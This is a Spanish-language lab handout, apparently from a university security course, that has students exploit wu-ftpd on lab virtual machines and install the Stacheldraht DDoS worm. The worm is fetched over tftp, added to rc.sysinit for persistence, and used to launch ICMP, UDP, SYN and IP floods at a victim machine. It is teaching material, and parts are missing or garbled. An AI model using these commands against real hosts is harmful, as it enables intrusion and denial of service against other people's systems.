Professional Documents
Culture Documents
LABORATORIO 4 MALWARE
OBJETIVOS
Analizar las tcnicas de Infeccin de Malware DDOS.
Detectar actividad maliciosa.
PROCEDIMIENTO
PARTE 1
Activaremos y configuraremos al INTRUSO y MASTERX.
Nota: Debido a que usaremos varias maquinas virtuales, al abrirles en
el vmware proceda a etiquetarlas (IN, MX, A1, A2, MY, A3): Menu VM >
Settings > Lengeta Options > Clic General
MAQUINA VIRTUAL PREPARADA INTRUSO
1. (IN) Se ha preparado una Maquina Virtual REDHAT 6.1:
Active la maquina virtual IN.
Al activar la maquina virtual:
Login: root
Password: ******
PARTE 2
El INTRUSO infectara a MASTER, atacando la vulnerabilidad de wu-ftp. A
travs de esta vulnerabilidad se instalara el Gusano de DDoS
stachelantigl. Este gusano esta compuesta por 3 partes (Atacante,
Master o Manager, Agente)
Nota: En la PC intruso se ha preparado un directorio /soft , con las
diferentes herramientas a usar.
DIRECTORIO TFTP
3. (IN) Crear el directorio RAIZ del TFTP y copiar stachelantigl:
# mkdir /tftpboot
# cp /soft/dos/stachelantigl.tar /tftpboot
ENVIAR EXPLOIT
4. (IN) Descomprima la herramienta de exploit ftp :
# cd /soft/vulne
-1-
ACCIONES
6. (IN) Se est dentro de la maquina MASTER. No visualizara ningn prompt. Pero
ya esta en dicha maquina.
OBJETIVO: En la ventana donde hemos ingresado a la victima,
crearemos un directorio temporal para transferir el gusano, luego
descomprimir, compilar y activar. Lo comandos que esta sombreado o
en cuadrado es la accin a tipear.
TRANSFERENCIA
mkdir /tmp/dos
cd /tmp/dos
pwd
/tmp/dos
tftp 192.168.90.113
get stachelantigl.tar
exit
cd /tmp/dos
pwd
/tmp/dos
ls
stachelantigl.tar
tar zxvf stachelantigl.tar
Descomprimiendo. Deber
visualizar que aparecen varios
archivos.
COMPILACION
-2-
ACTIVACION
echo /tmp/dos/mserv
>> /etc/rc.d/rc.sysinit
COMPROBAR
7. (MX) Visualice los puertos. El gusano activo la puerta 60001:
PRUEBAS DE CONTROL
Nota: El intruso se conectara al Master y establecer una sesin,
autentificndose con passphrase: piura. Luego de unos segundos
deber de aparecer el prompt (status: a!0 d!0)>.
9. (IN) Conectandose al MASTER X :
Conectndose a
192.168.90.114 (MX)
-3-
Los comandos
empiezan con punto.
PARTE 3
El INTRUSO infectara Al AGENTE A1, atacando la vulnerabilidad de wuftp, a travs de esta vulnerabilidad se instalara el Gusano de DDoS
stachelantigl. Se activara la parte agente del gusano.
MAQUINA VIRTUAL PREPARADA AGENTE A1
10. (A1) Se ha preparado una Maquina Virtual REDHAT 6.1:
Active la maquina virtual.
Configurando la conectividad de IP:
# ifconfig eth0 192.168.90.115
11. (IN) Realic el exploit e infectarlo :
Abra una nueva ventana de consola. (ALT + F2)
Envi el exploit:
# cd /soft/vulne/ftp
# ./awu 192.168.90.115
Nota: Al realizar el exploit aparecer el siguiente mensaje:
uid=o(root) gid=0(root) eigd=50(ftp) groups=50(ftp)
Linux rh61.empresa.com.pe
ACCIONES
12. (IN) A continuacin deber de imaginarse que esta en una consola remota del
AGENTE. No visualizara ningn prompt. Pero detrs es como si lo estuviera.
OBJETIVO: En la ventana donde hemos ingresado al AGENTE, crearemos
un directorio temporal para transferir el gusano, luego
descomprimir, compilar y activar. Lo comandos que esta sombreado o
en cuadrado es la accin a tipear.
TRANSFERENCIA
mkdir /tmp/dos
cd /tmp/dos
pwd
/tmp/dos
tftp 192.168.90.113
get stachelantigl.tar
exit
-4-
INSTALACION
cd /tmp/dos
pwd
/tmp/dos
ls
stachelantigl.tar
tar zxvf stachelantigl.tar
Ingresando al directorio
client y compilando
make
COMPILACION
ACTIVACION
Agregando para que se
cargue al iniciar el Sistema
Operativo. Ejecutando el
cliente td
INSCRIPCION
13. (A1) Visualizando envos:
En una ventana de consola ejecute el comando tcpdump
# tcpdump i eth0
-5-
PARTE 4
El INTRUSO infectara ahora al
AGENTES A2.
PARTE 5
El INTRUSO a travs de la PC MASTER X enviara las acciones de ataques
que realizara los agentes a la VICTIMA
17. (VI) Se h preparado una Maquina Virtual WINDOWS XP:
Descomprima Windows XP I1.rar
Active la maquina virtual.
Configure el dato de conectividad:
IP: 192.168.90.130
DNS: (No DNS) PUERTA DE ENLACE: (Sin puerta de Enlace)
ATAQUE #1 DE ICMP FLOOD
18. (IN) Enviando el ataque de Denegacin de Servicios :
Ubquese en la consola de control: ALT + F1
Ya fue
20. (VI) Monitoree el trafico:
-6-
La orden ha sido
recibida a los 2
agentes (2 bcasts).
ATAQUE #2 DE IP FLOOD
22. (IN) Enviando el ataque de IP:
(status: a!0 d!2) > .mip 192.168.90.130
23. (A1, A2) Visualice el monitoreo y observara grandes cantidades de envos
Ya fue
24. (VI) Monitoree el trafico:
EJERCICIO
26. Pruebe tambin los otros tipos de ataques:
COMANDO
.mudp
.msyn
.mnul
ATAQUE
UDP Flood
TCP Syn Flood
NUL Flood
-7-
PRUEBAS DE CONTROL
Nota: El intruso se conectara en otra ventana de consola al Master
(MY) y establecer una sesin, autentificndose con passphrase:
piura. Luego de unos segundos deber de aparecer el prompt
(status: a!0 d!0)>.
31. (IN) Conectandose al MASTER Y :
Aperture una nueva ventana de consola: ALT + F3
# cd /soft/dos/telnetc
Conectndose a
192.168.90.214 (MY)
Prompt
-8-
Nota: Puede pasar que al hacer estos comandos salga del programa si
esto sucede deber de volverse a conectarse y continuar con los
siguientes pasos.
PARTE 7
El INTRUSO a travs de la PC MASTER X y MASTER Y enviara las acciones
de ataques que realizara los agentes a la VICTIMA
ATAQUE DE ICMP FLOOD
32. (IN) Enviando el ataque de Denegacin de Servicios:
CONSOLA (ALT + F1) DE CONTROL MX
33. (A1, A2, A3) Visualice el monitoreo y observara grandes cantidades de envos
Ya fue
34. (VI) Monitoree el trafico:
Nota: La grafica
mostrada es un
plantilla sin trfico.
Diagrame la grafica que
esta visualizando y el
uso de la RED __ %
-9-